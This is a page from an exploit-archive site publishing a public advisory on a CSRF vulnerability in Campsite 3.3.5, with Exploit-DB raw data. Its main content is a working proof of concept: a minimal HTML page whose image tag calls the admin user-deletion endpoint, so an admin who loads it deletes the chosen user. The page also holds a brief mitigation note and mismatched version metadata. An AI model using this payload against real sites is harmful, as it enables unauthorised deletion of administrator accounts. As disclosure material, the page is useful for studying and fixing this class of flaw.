Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
campsite 3.3.5 CSRF Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
Campsite
by:
Pratul Agrawal
7.5
CVSS
HIGH
CSRF
352
CWE
Product Name: Campsite
Affected Version From: 3.3.2005
Affected Version To: 3.3.2005
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: PHP
Unknown

campsite 3.3.5 CSRF Vulnerability

The vulnerability allows an attacker to delete the Admin user through Cross Site Request Forgery (CSRF). The attacker can execute a script that sends a request to the targeted URL with the user ID, causing the user to be deleted.

Mitigation:

To mitigate this vulnerability, implement proper CSRF protections such as using CSRF tokens and validating the origin of requests.
Source

Exploit-DB raw data:

                     =======================================================================
   
                                         campsite 3.3.5 CSRF Vulnerability
 
                     =======================================================================
   
                                                     by
   
                                                Pratul Agrawal
 
   
   
  # Vulnerability found in- Admin module
   
  # email         Pratulag@yahoo.com
   
  # company       aksitservices
   
  # Credit by     Pratul Agrawal

  # Category  	  CMS / Portals
  
  # Site p4ge     http://wwwcampware.org/
  
  # Plateform     php
  
   
   
  #  Proof of concept   #
 
  Targeted URL:  http://server/admin/login.php
  
 
  Script to delete the Admin user through Cross Site request forgery
  
             .  ..................................................................................................................
  
                        <html>
  
                          <body>
  
                           <img src=http://server/admin/users/do_del.php?User=[userID]&uType=Staff />
  
                          </body>
  
                        </html>
  
  
             .  ..................................................................................................................
  
  
  
  After execution refresh the page and u can see that user having giving ID  get deleted automatically.
 
 
#If you have any questions, comments, or concerns, feel free to contact me.

Navigation

Suggest Exploit

Services By CQR